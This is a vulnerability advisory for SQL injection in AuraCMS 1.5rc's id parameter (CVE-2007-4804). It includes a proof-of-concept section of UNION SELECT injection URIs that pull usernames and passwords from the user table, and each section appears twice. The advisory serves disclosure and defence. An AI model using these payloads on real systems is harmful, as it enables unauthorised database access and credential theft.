AuraCMS ID Parameter Multiple SQL Injection Vulnerabilities
BID:25614
Info
AuraCMS ID Parameter Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 25614 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-4804 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 10 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | k1tk4t is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
auraCMS Aura CMS 1.5rc |
| Not Vulnerable: | |
Discussion
AuraCMS ID Parameter Multiple SQL Injection Vulnerabilities
AuraCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect AuraCMS 1.5rc; other versions may also be vulnerable.
AuraCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect AuraCMS 1.5rc; other versions may also be vulnerable.
Exploit / POC
AuraCMS ID Parameter Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/auracms15/?pilih=hal&id=-9%20UNION%20SELECT%200,user,password%20from%20user/*
http://www.example.com/auracms15/cetak.php?id=-9%20UNION%20SELECT%20null,null,null,password,null,user,null,null%20from%20user/*
http://www.example.com/AuraCMS1.5/?pilih=lihat&id=-9%20UNION%20SELECT%20null,user,password,null,null,null,null,null%20from%20user/*
http://www.example.com/AuraCMS1.5/?pilih=pesan&id=-9%20UNION%20SELECT%20null,null,null,concat(user,0x3a,password),null,null,null,null%20from%20user/*
http://www.example.com/AuraCMS1.5/?pilih=teman&id=-9%20UNION%20SELECT%20null,concat(user,0x3a,password),null,null,null,null,null,null%20from%20user/*
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/auracms15/?pilih=hal&id=-9%20UNION%20SELECT%200,user,password%20from%20user/*
http://www.example.com/auracms15/cetak.php?id=-9%20UNION%20SELECT%20null,null,null,password,null,user,null,null%20from%20user/*
http://www.example.com/AuraCMS1.5/?pilih=lihat&id=-9%20UNION%20SELECT%20null,user,password,null,null,null,null,null%20from%20user/*
http://www.example.com/AuraCMS1.5/?pilih=pesan&id=-9%20UNION%20SELECT%20null,null,null,concat(user,0x3a,password),null,null,null,null%20from%20user/*
http://www.example.com/AuraCMS1.5/?pilih=teman&id=-9%20UNION%20SELECT%20null,concat(user,0x3a,password),null,null,null,null,null,null%20from%20user/*
Solution / Fix
AuraCMS ID Parameter Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].